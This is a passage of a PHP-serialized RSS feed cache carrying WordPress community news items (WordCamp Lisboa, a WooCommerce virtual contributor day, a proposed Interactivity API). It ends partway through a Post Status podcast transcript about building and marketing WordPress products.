+0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"rmartinezduque\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:38;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"Do The Woo Community: BobWP is Speaking at WordCamp Lisboa\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"https://dothewoo.io/?p=74701\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"https://dothewoo.io/bobwp-wordcamp-lisboa/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:318:\"<p>BobWP will be speaking about community at WordCamp Lisboa 2023.</p>\n<p>&gt;&gt; The post <a rel=\"nofollow\" href=\"https://dothewoo.io/bobwp-wordcamp-lisboa/\">BobWP is Speaking at WordCamp Lisboa</a> appeared first on <a rel=\"nofollow\" href=\"https://dothewoo.io\">Do the Woo - a WooCommerce Builder Community</a>	.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 03 Apr 2023 10:22:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:39;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"WPTavern: WooCommerce to Host Virtual Contributor Day April 19, 2023\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=143218\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"https://wptavern.com/woocommerce-to-host-virtual-contributor-day-april-19-2023\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2157:\"<p>WooCommerce has announced a 24-hour virtual contributor day that will happen on April 19, 2023. Contributors will be working on the <a href=\"https://github.com/woocommerce/woocommerce\">WooCommerce Core</a> and <a href=\"https://github.com/woocommerce/woocommerce-blocks\">WooCommerce Blocks</a> repositories. To give better coverage over time zones, organizers will have two kickoff times (0 UTC and 12 UTC).</p>\n\n\n\n<p>WooCommerce hasn&#8217;t had a WooConf in-person conference since 2017, opting instead for virtual events like WooSesh where people can attend and watch presentations for free. The open source project has focused more on virtual communication channels to help contributors stay connected, such as the new <a href=\"https://wptavern.com/woocommerce-to-launch-wc-blocks-extensibility-monthly-chat\">monthly chat focused on WooCommerce block extensibility</a>. This virtual contribution day will be the first of its kind for WooCommerce. </p>\n\n\n\n<p>&#8220;We are asking for a minimum of 4 hours of your time to dedicate to a curated list of issues,&#8221; WooCommerce developer advocate Stephanie Pi said. &#8220;These issues have been selected based on the effort needed to solve them –we’re only including issues that we believe can be solved within the day.</p>\n\n\n\n<p>&#8220;Any issues picked up and worked on during contributor day will be merged before the next release.<strong> </strong>We are committed to making sure this happens because we want to honor the time our community is dedicating to this event.&#8221;</p>\n\n\n\n<p>The virtual event will be a more intense, focused time than what one might experience at a WordCamp contributor day, with key WooCommerce decision makers present to help keep things moving.</p>\n\n\n\n<p>Organizers will be creating new channels in the <a href=\"https://woocommercecommunity.slack.com/\">WooCommerce Community Slack</a>, that will be dedicated to the different issues they plan to work on during the 24-hour event. This includes a channel for helping contributors get set up with a development environment. Those interested to attend can watch for updates in the #announcements channel.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 01 Apr 2023 01:02:25 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:40;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"WPTavern: WordPress Contributors Propose New Interactivity API for Frontend Blocks\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=143152\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"https://wptavern.com/wordpress-contributors-propose-new-interactivity-api-for-frontend-blocks\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6558:\"<p>Over the past year a group of WordPress contributors have been <a href=\"https://make.wordpress.org/core/2022/04/27/exploration-to-enable-better-developer-and-visitor-experiences-with-blocks/\">working</a> on making it easier for developers to build interactive blocks. These are the kinds of experiences that allow visitors to submit a form and get feedback without reloading the page, load paginated content without refreshing, and improve e-commerce stores with more dynamic responses based on visitor interaction. </p>\n\n\n\n<p>A new <a href=\"https://make.wordpress.org/core/2023/03/30/proposal-the-interactivity-api-a-better-developer-experience-in-building-interactive-blocks/\">proposal for an Interactivity API</a> aims to provide a standard way for developers to add interactivity to the frontend, making it faster to build these experiences without reinventing the wheel every time. </p>\n\n\n\n<p>Automattic-sponsored core contributor Mario Santos cast the vision for what the new API will deliver: </p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>What if effortlessly creating performant, fluid, and idiomatic frontend interactivity on block-based WordPress sites was possible? Imagine plugins providing interactions like “heart this post” or “add to cart” without page reloads. Picture instant search, commenting, and native full-page transitions as best-in-class built-ins without complex scaffolding or external tools. Envision achieving this in any block theme by default without sacrificing PHP server rendering and the plugin ecosystem for a JS runtime. Visualize block developers easily declaring and extending such behaviors in a way that is immediately familiar and compatible with the block ecosystem.</p>\n</blockquote>\n\n\n\n<p>Santos published a demo video accompanied by a <a href=\"https://wpmovies.dev/\">live interactive demo</a> where visitors can favorite movies and have the favorite count instantly updated in the block in the header. Pagination and search update the content without refreshing the page. The code for the demo is <a href=\"https://github.com/WordPress/wp-movies-demo\">available on GitHub</a>.</p>\n\n\n\n\n\n\n\n<p>The Interactivity API is being created for use on the frontend of block-based websites but contributors may also explore the possibility of reusing some of its directives inside the editor. They are taking a similar approach to <a href=\"https://alpinejs.dev/\">Alpine.js</a> with &#8220;directives&#8221; that extend HTML with special attributes, except designed specifically for WordPress and backwards compatible with its APIs. </p>\n\n\n\n<p>&#8220;The API is designed for the world of blocks and takes WordPress history of being closely attached to web standards to heart,&#8221; Santos said.</p>\n\n\n\n<p>&#8220;As directives are added to the HTML, they work great with dynamic blocks and PHP.&#8221;</p>\n\n\n\n<p>Having a standard in place means that WordPress developers don&#8217;t have to roll their own solutions for things like tooling, inter-block communication, and frontend performance. They would be primarily responsible for the block logic, making creating interactive blocks easier and more approachable for less experienced developers.</p>\n\n\n\n<p>Contributors on the project have selected <a href=\"https://preactjs.com/\">Preact</a> to build the directives system due to its HTML-friendliness, small size, performance, extensibility, and compatibility with React.</p>\n\n\n\n<p>The Interactivity API is currently in the stage of gathering feedback to incorporate in development as well as expanding technical documentation. </p>\n\n\n\n<p>&#8220;Although it is now distributed as a plugin, it aims to be added as an experimental feature to Gutenberg,&#8221; Santos said. &#8220;The goal is to include it in Core once enough feedback has been gathered, and it’s clear that it’s the right direction.&#8221;</p>\n\n\n\n<p>Initial reactions to the proposed API have been mostly positive, as developers have previously had to build their own solutions for interactivity in the absence of a standard.</p>\n\n\n\n<p>&#8220;The Interactivity API is one of the most interesting proposals for WordPress frontend UX &amp; DX that I&#8217;ve seen in awhile,&#8221; WordPress Core contributor Weston Ruter <a href=\"https://twitter.com/westonruter/status/1641521738805809152\">said</a>.</p>\n\n\n\n<p>&#8220;As someone who has been experimenting a lot with using AlpineJS, HTMX, Unpoly, StimulusJS, etc. for interactivity on the frontend, having a blessed solution in WP core would be most welcome,&#8221; another developer (@r1ckd33zy) <a href=\"https://twitter.com/r1ckd33zy/status/1641573350701948928\">commented</a>.</p>\n\n\n\n<p>WordPress developer and WPGraphQL contributor David Levine seemed less enthused about the approach outlined in the proposal. &#8220;Great idea but shortsighted execution,&#8221; Levine said. &#8220;We need an actual block data layer, not to further pollute our markup for our scripts to parse. This just exacerbates the same problems that got us into this mess.&#8221;</p>\n\n\n\n<p>A few others in the comments of the post have been critical of the approach and  others have questions about long term challenges of maintaining this approach.</p>\n\n\n\n<p>&#8220;This is a pretty out-there which is quite a different approach to anything I’ve seen before,&#8221; WordPress core contributor Joe Hoyle said. &#8220;That does give me caution, as it’s very wp specific / centric. I think with the block editor there’s opportunity to align more with industry innovation around front-end tooling. I think it’s really great work and very creative; but again I’m not yet sure it’s the right direction. It could be that there’s no long term solution to bring an &#8216;nextjs&#8217;-ification to WordPress, but I’m not sure I’m looking at it.&#8221;</p>\n\n\n\n<p>The proposal includes examples of how to create interactive blocks using the API and developers have opened a lively discussion on the approach. Contributors on the Interactivity API are planning to host two sessions on April 17, 2023 (<a href=\"https://www.meetup.com/learn-wordpress-online-workshops/events/292575913/\">one at 08:00UTC</a> and <a href=\"https://www.meetup.com/learn-wordpress-online-workshops/events/292575942/\">another at 17:00UTC</a>) that will include a live product demo followed by a Q&amp;A. Check out the proposal for more details and the <a href=\"https://github.com/WordPress/block-interactivity-experiments\">Interactivity API GitHub repo</a> to see some experiments the team has been working on so far.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 31 Mar 2023 14:48:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:41;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"Post Status: Launching a WordPress Product in Public: Session 7\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://poststatus.com/?p=148593\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"https://poststatus.com/launching-a-wordpress-product-in-public-session-7/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:63823:\"<div class=\"wp-block-group eplus-wrapper has-theme-palette-2-color has-theme-palette-8-background-color has-text-color has-background is-layout-flow\"><div class=\"wp-block-group__inner-container\"><div class=\"wp-block-post-excerpt\"><p class=\"wp-block-post-excerpt__excerpt\">In this episode, <a href=\"https://twitter.com/coreymaass\">Corey Maass</a>, a freelance web developer, joins <a href=\"https://twitter.com/corymiller303\">Cory Miller</a> to discuss the intricacies of creating an impactful, user-appreciated product that makes a positive impact on customers and stands apart in a saturated industry. </p></div>\n\n\n<div class=\"wp-block-spacer eplus-wrapper\"></div>\n\n\n<span class=\"span-reading-time rt-reading-time\"><span class=\"rt-label rt-prefix\">Estimated Reading Time:</span> <span class=\"rt-time\"> 33</span> <span class=\"rt-label rt-postfix\">minutes</span></span>\n</div></div>\n\n\n\n\n\n\n\n<p><a href=\"https://poststatus.com/planet/feed/#h-transcript\">Transcript</a> ↓</p>\n\n\n\n<p>Learn from <a href=\"https://twitter.com/coreymaass\">Corey Maass</a>, the go-to on WordPress product design topics, and <a href=\"https://twitter.com/corymiller303\">Cory Miller</a>, a master on the business of WordPress. They discuss finding the balance in the small and big pictures of product development, highlighting the process of trial and error.</p>\n\n\n\n<p><strong>Top Takeaways:</strong></p>\n\n\n\n<ul>\n<li><strong>Courage Under Fire.</strong> After what feels like a miserable failure, it’s vital to keep trudging forward. Great product design takes time to build and grow in the space you are putting it into. Keeping your passion alive and remaining consistent in your efforts will eventually lead you to success.&nbsp;</li>\n\n\n\n<li><strong>The Impact of Thoughtful Design.</strong> Developing a product is, of course, based on meeting some kind of user need, but it’s important to consider if you are going to make that user’s life easier with your product. When the end user is your top priority, your product will shine, and you’ll be proud of your direct impact on someone’s everyday life. </li>\n\n\n\n<li><strong>Finding the Spark in Your Product.</strong> Focusing on the overall product journey is key for great product development, but zooming in on the minor details is equally important. Brainstorming and finding the spark is not easy, but setting your product apart from the rest is crucial. </li>\n\n\n\n<li><strong>Using Your Audience to Improve Development</strong>. Put your ideas and questions out there for your audience to speak to. If you are wondering how people will perceive a certain product aspect or want more information on their exact pain points, it’s good to ask directly. Getting information straight from your customers or peers can help you make well-informed decisions in product development.</li>\n</ul>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n\n</div>\n\n\n\n<h3 class=\"eplus-wrapper wp-block-heading\" id=\"h-mentioned-in-the-show\"><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f517.png\" alt=\"🔗\" class=\"wp-smiley\" /> Mentioned in the show:</h3>\n\n\n\n<ul>\n<li><a href=\"https://crop.express/\">Crop.Express</a></li>\n\n\n\n<li><a href=\"https://www.google.com/aclk?sa=l&ai=DChcSEwiIyKyw6PL9AhVlyZQJHT6EAcYYABAKGgJ5bQ&ei=bawcZJe0G8epqtsPivSAqA8&sig=AOD64_0_PN97hzZ3jYMLTv3M0suhf9h2Ag&q&sqi=2&adurl&ved=2ahUKEwjXnqSw6PL9AhXHlGoFHQo6APUQ0Qx6BAgKEAE\">StickerMule</a></li>\n</ul>\n\n\n\n<h3 class=\"eplus-wrapper wp-block-heading\" id=\"h-you-can-follow-post-status-and-our-guests-on-twitter\"><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f426.png\" alt=\"🐦\" class=\"wp-smiley\" /> You can follow Post Status and our guests on Twitter:</h3>\n\n\n\n<ul class=\"eplus-wrapper\">\n<li><a href=\"http://twitter.com/coreymaass\">Corey Maass</a></li>\n\n\n\n<li><a href=\"https://twitter.com/corymiller303\">Cory Miller</a> (CEO, <a href=\"https://twitter.com/post_status\">Post Status</a>)</li>\n\n\n\n<li><a href=\"https://twitter.com/lemonadecode\">Olivia Bisset</a> (Intern, <a href=\"https://twitter.com/post_status\">Post Status</a>)</li>\n</ul>\n\n\n\n<p class=\"eplus-wrapper has-background\">The <strong>Post Status Draft</strong> podcast is geared toward WordPress professionals, with interviews, news, and deep analysis. <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f4dd.png\" alt=\"📝\" class=\"wp-smiley\" /><br /><br /><a href=\"https://poststatus.com/category/post-status-podcasts/\" target=\"_blank\" rel=\"noreferrer noopener\">Browse our archives</a>, and don’t forget to subscribe via <a href=\"https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008\" target=\"_blank\" rel=\"noreferrer noopener\">iTunes</a>, <a href=\"https://podcasts.google.com/feed/aHR0cHM6Ly9mZWVkcy5zaW1wbGVjYXN0LmNvbS8ySkU5c2M4UA\" target=\"_blank\" rel=\"noreferrer noopener\">Google Podcasts</a>, <a href=\"https://www.youtube.com/c/PostStatus\" target=\"_blank\" rel=\"noreferrer noopener\">YouTube</a>, <a href=\"http://www.stitcher.com/podcast/krogsgard/post-status-draft-wordpress-podcast\" target=\"_blank\" rel=\"noreferrer noopener\">Stitcher</a>, <a href=\"https://wordpress-post-status-draft-podcast.simplecast.com/\" target=\"_blank\" rel=\"noreferrer noopener\">Simplecast</a>, or <a href=\"https://feeds.simplecast.com/2JE9sc8P\">RSS</a>. <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f3a7.png\" alt=\"🎧\" class=\"wp-smiley\" /></p>\n\n\n\n<h2 class=\"eplus-wrapper wp-block-heading\" id=\"h-transcript\">Transcript</h2>\n\n\n\n<h2 class=\"wp-block-heading\">Session 7 Corey &amp; Cory Launch a WordPress Product Live</h2>\n\n\n\n<p>Corey Maass: [00:00:00] So now I&#8217;m following along. I&#8217;ve gotten in the habit of. I opened the<br />YouTube, which is, well, it&#8217;s live, which is really disorienting cuz of course I&#8217;m talking, uh, 10<br />seconds ago or 10 seconds in the future. And then grab the chat and then close it as fast as I<br />can,<br />because it seems that people do ask us questions, but mostly on YouTube, not on, uh, the<br />webinar, the Zoom webinar.<br />Cory Miller: Um, sorry, I was just trying to get all that going. Um, yeah, speaking of what we&#8217;re<br />talking about today in the marketing channel with post status, there&#8217;s some good conversations<br />about product. Hmm. I was like, you know, there&#8217;s enough of this going around that we, um,<br />should we have more conversations about product and marketing.<br />And [00:01:00] channels.<br />Corey Maass: Um, I have to go find, I&#8217;ve got, um, I&#8217;m in product owner and I&#8217;m in a couple of<br />others, but I&#8217;m not in marketing. Oh, okay. You&#8217;re already in here. Yeah. Product leaders I&#8217;m in.<br />Cory Miller: Yeah. Um, I really want that product leaders channel to. This type of, you know,<br />conversation, whatever it has to do with product, you know?<br />Right.<br />Corey Maass: So, yeah, and it&#8217;s, I mean, it&#8217;s a popular topic. Like I, I was on Twitter five<br />minutes ago and somebody was asking like, who is marketing WordPress plugins? Well these<br />days? And of course was scrolling the answers to see who to follow or what examples to look at,<br />or, you know, there&#8217;s, I mean, a few known quantities.<br />Um, and articles and, and references and stuff, but well, you know, [00:02:00] year to year and,<br />and new products that will cause blips and, and whatnot. Yeah. Um, you know, because it&#8217;s<br />definitely still not a. You know, not a known thing. I mean, marketing anything is not, is never<br />necessarily reliable. But, uh, marketing a WordPress plugin.<br />There are people who are very successful with WordPress plugins, but I don&#8217;t know that the<br />marketing is, it&#8217;s not a solved problem. You know,<br />Cory Miller: I think we said this a lot, but I really love product. Um, but it feels like. Almost like<br />gambling, you know? Um, like this one, I continue to see there&#8217;s something here and we say<br />this, we don&#8217;t know what it is and we&#8217;re trying to kinda keep stepping into it.<br />But gosh, I&#8217;ve tried a bunch of products between I themes and today, you know, bunch of<br />different things. And they weren&#8217;t like [00:03:00] pure software products of course. Um, but.<br />Every time I talk about product, I realize how much I have to learn .<br />Corey Maass: Um, so there&#8217;s, um, they&#8217;re the people who I, I&#8217;m not gonna even try to mention<br />names, but it&#8217;s like, there are, there are people who are famous for breaking the land speed<br />record, you know, or the like, uh, What was his name?<br />Hopkins was in the, a movie called The Indian, and it was his, about his motorcycle or you know,<br />there&#8217;s nascar, like there&#8217;s the people who win over year, over year. And, and then there&#8217;s,<br />there&#8217;s gotta be the people who were fascinating, you know, they, they worked a, a regular job<br />and they spent every night and weekend working on, you know, Build, trying to build the fastest<br />[00:04:00] race car or the fastest motorcycle and, and have absolutely died in obscurity, , you<br />know, like, they just never, they d take a, take a motorcycle out to the flats, crash it, start over<br />again, you know, and, and have done it.<br />Or did it, you know, for 30 years or whatever, and, and we&#8217;re never gonna hear about any of<br />those people, you know, or they consistently came in third and we&#8217;re never gonna hear about<br />any of those people. Yeah. And it&#8217;s like, I&#8217;m a while ago, I had to th there was a time in my life<br />where I was absolutely convinced that I was going to be a rockstar dj, where I was going to be<br />the gazillion.<br />Uh, entrepreneur or, and I still would love to be all those things. Well, I don&#8217;t know if I have the<br />energy anymore, but Me too. Um, you know, um, but it, they were, they were tied into my<br />identity and they were like constant. You know, a need and would keep me up at night. And now<br />I&#8217;m like, I [00:05:00] have, I think part of middle age is accepting your mediocrity.</p>\n\n\n\n<p>Um, and, and just going, you know, okay, if, if I&#8217;m, if I&#8217;m successful, if I&#8217;m having some fun and<br />I&#8217;m successful enough that I&#8217;m not, Uh, starving, you know, then, then that&#8217;s then and, and then<br />it&#8217;s fun to keep trying, you know, and, and on my deathbed, it, it&#8217;s still probably gonna hurt that I<br />didn&#8217;t, you know, uh, headline, uh, you know, some huge music festival or something, but, uh,<br />but at least I tried, I suppose<br />Cory Miller: I, I love that. Thank you for sharing that. Um, you know, because I, I totally. , um, in<br />so many ways. I feel like I had my time. Mm-hmm. , you know, I got my opportunity and I made,<br />I made the most of it. I&#8217;m, I&#8217;m proud of it, you know, uh, and that, that was a [00:06:00] very<br />magical period for me. You know? But when you&#8217;re talking, have you seen the Netflix?<br />It made me think of the Netflix special full swing. It&#8217;s about golf. So, I know you golf. I don&#8217;t, I put<br />putt golf, you know, but, um, even though we have a son named Callaway, everybody thinks we<br />named it after a golf club. And I&#8217;m like, no, sorry, , um, him out after a golf club. But, okay, so this<br />last episode, there&#8217;s a guy, and you may name, you may know his name, and I&#8217;m like, I, if, if<br />there were jerseys in golf, I&#8217;m not a.<br />I would go buy his jersey today. He&#8217;s like the 70th best. Mm-hmm. golfer in the world. His name<br />is Joel Drum. I can&#8217;t remember. I&#8217;ll f I&#8217;ll find his name. So the first episode, have you seen this?<br />Mm-hmm. . Okay. You, I think you&#8217;d be interested. I&#8217;m like you said. Full swing. Full swing. It&#8217;s a<br />documentary about the [00:07:00] PGA.<br />I&#8217;m morbidly curious about sports because I think it has so many parallels. Anyway, so the first<br />two were like, the brand names Justin Thomas, uh, Jordan Sp, and now I know those names<br />well, but I was familiar with their names. Sure. And like they&#8217;re at the top pinnacle of the sport.<br />Then the third episode is, is is Joel, and he&#8217;s basically like, I&#8217;m okay being seven.<br />like he&#8217;s got immense talent. Um, his caddy, everybody&#8217;s like, no, he&#8217;s a top 30 golfer. And he&#8217;s<br />just kinda like, you know, he&#8217;s, he could be like, he won, he&#8217;s won, but like, he could be even<br />better. But he&#8217;s just like, k he feels like almost resigned contend of being like 70th. And I. Maybe<br />I&#8217;m okay being like 500th best or five thousandths best at being an entrepreneur, being a<br />product person, right?<br />Um, [00:08:00] I am morbidly attracted to entrepreneurship and product. Like I think you and I<br />resonate with this. Like every time I hear you talk, man, I would go. Rather from another mother,<br />like he, you know,<br />Corey Maass: I could have said those words or have had or have said those words. Yeah,<br />exactly.<br />Cory Miller: But I think there&#8217;s something resonating here, Corey.<br />It&#8217;s the esteem that I, I&#8217;m gonna talk by myself. The esteem I might talk about, like iconic,<br />everybody says it, Steve, let me invoke his name. Steve Jobs right now, first time around, I<br />think. Right time, right place, and of course genius, you know, but right time, right place, right.<br />Critical thing got kicked out of Apple, comes back and doing it again, and we always talk about<br />him.<br />Right. You know, maybe, maybe Elon Musk in my mind before he started doing, just, I don&#8217;t<br />know. Um, he, I think he went too far. He overreach. But anyway, but I go, God, [00:09:00] I&#8217;d<br />love to have that kind of genius for product for. and, but selling down in Maine, like you were<br />saying about middle, middle age and Meoc, just going, Hey, I think I got some talent , you know,<br />but mainly I just work my ass off.<br />Mm-hmm.<br />Corey Maass: I&#8217;m one of those, try things and try things.<br />Cory Miller: I feel like one of those sports players, like if we use that metaphor analogy,<br />whatever it is, and I. Never gonna be number one. Mm-hmm. never gonna be top 50. But for my<br />brand of those, I&#8217;m really content with who I am. You know? Right. Even though I&#8217;m just like,<br />God, it feels like with product it&#8217;s miserable Failure.<br />Miserable failure. Miserable failure. Miserable failure. When 2008, man, I felt like I&#8217;m gonna mix<br />all these sports things, get up to the plate, ball&#8217;s coming, [00:10:00] and I hit it. And I get into the<br />field<br />Corey Maass: and you scored a touchdown<br />Cory Miller: and . Yes. And a hole in one and you know, let me find another sport so I can do it.<br />But you don&#8217;t end up in the gutter.<br />I think the reality is, yeah, , I need bumpers for my bowling entrepreneur, bowling, and there you<br />go. Product person. I need some bumpers. I feel like sometimes, and I&#8217;m glad I. I couldn&#8217;t laugh</p>\n\n\n\n<p>about this a couple years ago at all. Hmm. I&#8217;d be like, what? I have magic. I&#8217;m supposed to be<br />magic. I&#8217;m supposed to come.<br />Right. You know, and then you&#8217;re like, maybe not . It&#8217;s the humbling effect of that. Yep. And I<br />think when you come down to it, you go, I think the reason why I&#8217;m so interested in product is<br />like it&#8217;s a gift. It should be like this cool gift that you&#8217;re trying to help someone. Make somebody&#8217;s<br />life better and in the process be [00:11:00] able to do it vocationally and get paid for it.<br />Yeah. And man, I love that about work, you know, and products specifically is like tie to this little<br />bow, here&#8217;s your present and I&#8217;m trying to get better about this is I&#8217;m trying to offer a gift that you<br />pay for. Of course. You know, like those win-win things. But I digress.<br />Corey Maass: Yeah, it&#8217;s, I love solving a problem.<br />I love the, like, this is gonna sound weird, but I love the angles of it. Like the, uh, moving through<br />a problem, uh, like screens and inner, like, I, I want to feel clever for having built it, like build a<br />better mouse trap. But I also want, that&#8217;s a bad analogy cuz a mouse, mouse uses a mouse<br />trap. But it&#8217;s like, I, I wanna build, you know, the, the better.<br />Thing that other people then get pleasure out of using to, again, to [00:12:00] solve a problem.<br />Um, and so then I feel smart. And they feel smart. And, and it&#8217;s like, to me it&#8217;s, it&#8217;s one of the<br />epitome of the human condition is, is solving problems, is manipulating the space around us.<br />And, um, and so yeah, product just absolutely.<br />Resonated with me early on. Which is funny because I think I, and a lot of, a lot of developers<br />and a lot of product people also are passionate about music in one way or another, which is the<br />opposite. It&#8217;s so abstract. It can mean anything to anybody. It&#8217;s totally subjective, uh, as opposed<br />to like, In the world we live in, like there&#8217;s a little bit of subjectivity.<br />Like there&#8217;s, you know, there&#8217;s a reason why there&#8217;s a million to-do list apps because everybody<br />solves it slightly differently or wants it to feel slightly different. But it&#8217;s still, uh, you know, there&#8217;s<br />still ones that objectively don&#8217;t [00:13:00] work. , uh, uh, But anyway. Yeah, it&#8217;s, it&#8217;s, it&#8217;s fun. It&#8217;s<br />interesting.<br />It&#8217;s, I&#8217;m glad that it&#8217;s now a hobby rather than, uh, something that I, that I&#8217;m relying on. Cuz I<br />remember building, I think I&#8217;ve talked about this before, like, I remember building things because<br />I was like, I&#8217;m not gonna make rent if this doesn&#8217;t succeed. And of course it didn&#8217;t come close to<br />succeeding. I don&#8217;t even think I was able to finish it cuz it was like, I can&#8217;t make a logical<br />decision.<br />From a position of desperation, like some people can mm-hmm. , but I just, I can&#8217;t, I have to like<br />sit in it and splash around. Which is also why, because I think maybe it was another Twitter<br />conversation I was having, but, um, I, I often. Will. Oh, so yeah, somebody, somebody asked<br />like, do you, do you 